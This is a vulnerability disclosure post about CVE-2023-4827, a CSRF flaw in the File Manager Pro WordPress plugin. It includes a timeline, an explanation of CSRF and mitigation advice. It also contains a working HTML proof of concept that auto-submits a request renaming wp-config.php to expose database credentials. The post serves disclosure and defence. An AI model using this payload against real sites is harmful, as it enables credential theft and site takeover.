During testing of the plugin, a CSRF vulnerability was discovered in action=rename, which can lead to denial of service and theft of the password from the database, thereby allowing an attacker to get inside the web application and gain a foothold in it. Replace any data in the database and do everything that an administrator can do. After logging into the database, he can create a new user and attach a hashed password to it. And through the administrator to implement RCE remote code execution

Main info:

CVECVE-2023-4827
PluginFile Manager Pro
CriticalVery High
Publicly PublishedSeptember 12, 2023
Last UpdatedSeptember 12, 2023
ResearcherDmtirii Ignatyev
OWASP TOP-10A2: Broken Authentication and Session Management
PoCYes
ExploitWill be later
Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4827
https://wpscan.com/vulnerability/d4daf0e1-8018-448a-964c-427a355e005f
Plugin Security Certification by CleanTalk

Timeline

August 25, 2023Plugin testing and vulnerability detection in the File Manager Pro access plugin have been completed
August 25, 2023I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
September 8, 2023The author has released a fix update
September 8, 2023Registered CVE-2023-4827

Discovery of the Vulnerability

In the ever-evolving landscape of web security, the discovery of vulnerabilities is a critical aspect of keeping online systems safe. Recently, a noteworthy vulnerability, identified as CVE-2023-4827, was uncovered in File Manager Pro, specifically in versions prior to 1.8. This vulnerability poses a significant risk to web applications utilizing this plugin.

The vulnerability was first identified during a routine security assessment of the File Manager Pro plugin. It was categorized as a Cross-Site Request Forgery (CSRF) vulnerability, which, when exploited, could lead to remote code execution (RCE) on the affected web application.

Understanding of CSRF attack’s

Before delving into the specifics of this vulnerability, it’s crucial to understand what CSRF is and how it operates. CSRF, or Cross-Site Request Forgery, is a type of attack where an attacker tricks a user into executing actions on a web application without their consent. Essentially, it involves the exploitation of a user’s authenticated session to perform actions without their knowledge.

To illustrate this, imagine a scenario where an authenticated user is tricked into clicking a seemingly innocent link on a malicious website. This link sends a request to a target web application where the user is logged in, executing actions as if they initiated them themselves.

Exploiting the CSRF

In the case of CVE-2023-4827, the vulnerability was discovered in the “action=rename” feature of File Manager Pro. This vulnerability allows an attacker to craft a malicious CSRF request that forces an authenticated user to rename a file. While this may seem relatively benign at first glance, it has the potential for devastating consequences.

By exploiting this CSRF vulnerability, an attacker can initiate a series of actions leading to a remote code execution (RCE) scenario. They can gain control over the web application, potentially extracting sensitive information from the database, altering data, or even creating new users with hashed passwords. The attacker can effectively assume the privileges of an administrator and manipulate the application as they see fit.

POC html code:

<html> 

  <body> 

  <script>history.pushState(”, ”, ‘/’)</script> 

    <form action=”http://127.0.0.1/wordpress/wp-admin/admin-ajax.php”> 

      <input type=”hidden” name=”action” value=”fs&#95;connector” /> 

      <input type=”hidden” name=”cmd” value=”rename” /> 

      <input type=”hidden” name=”name” value=”wp&#45;config&#46;txt” /> 

      <input type=”hidden” name=”target” value=”l1&#95;d3AtY29uZmlnLnBocA” /> 

      <input type=”submit” value=”Submit request” /> 

    </form> 

    <script> 

      document.forms[0].submit(); 

    </script> 

  </body> 

</html>

Potential Risks and Real-World Impact

The potential risks associated with this vulnerability are significant. In a real-world scenario, an attacker could use CSRF to exploit File Manager Pro, gain access to a web application’s database, and compromise its security. They could then exfiltrate sensitive data, modify critical settings, or inject malicious code, potentially causing data breaches or service disruptions. Moreover, the attacker could establish persistent access, allowing them to maintain control over the application, leading to long-term security concerns.

Recommendations for Improved Security

To mitigate the risk associated with CVE-2023-4827 and similar CSRF vulnerabilities, several security measures should be considered:

  1. Update and Patch: It is crucial to keep all software, including plugins and themes, up to date. Developers often release patches to address security vulnerabilities.
  2. CSRF Protection: Implement robust CSRF protection mechanisms, such as anti-CSRF tokens, to ensure that requests are only executed when initiated by legitimate users.
  3. Security Audits: Regular security audits and penetration testing can help identify and address vulnerabilities before they can be exploited.
  4. Least Privilege Principle: Restrict user privileges to the minimum required for their tasks to limit potential damage in the event of a breach.

In conclusion, CVE-2023-4827 serves as a stark reminder of the importance of maintaining vigilance in the ever-evolving landscape of cybersecurity. By understanding CSRF and taking proactive steps to secure web applications, developers and administrators can minimize the risks associated with such vulnerabilities and protect their systems from potential exploitation.

#WordPressSecurity #CSRF #WebsiteSafety #StayProtected #VeryHighVulnerability

Use CleanTalk solutions to improve the security of your website

Dmitrii i.

If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.


Check my website

CVE-2023-4827 – File Manager Pro < 1.8 - Remote Code Execution via CSRF

Create your CleanTalk account



By signing up, you agree with license. Have an account? Log in.


One thought on “CVE-2023-4827 – File Manager Pro < 1.8 - Remote Code Execution via CSRF

Leave a Reply

Your email address will not be published. Required fields are marked *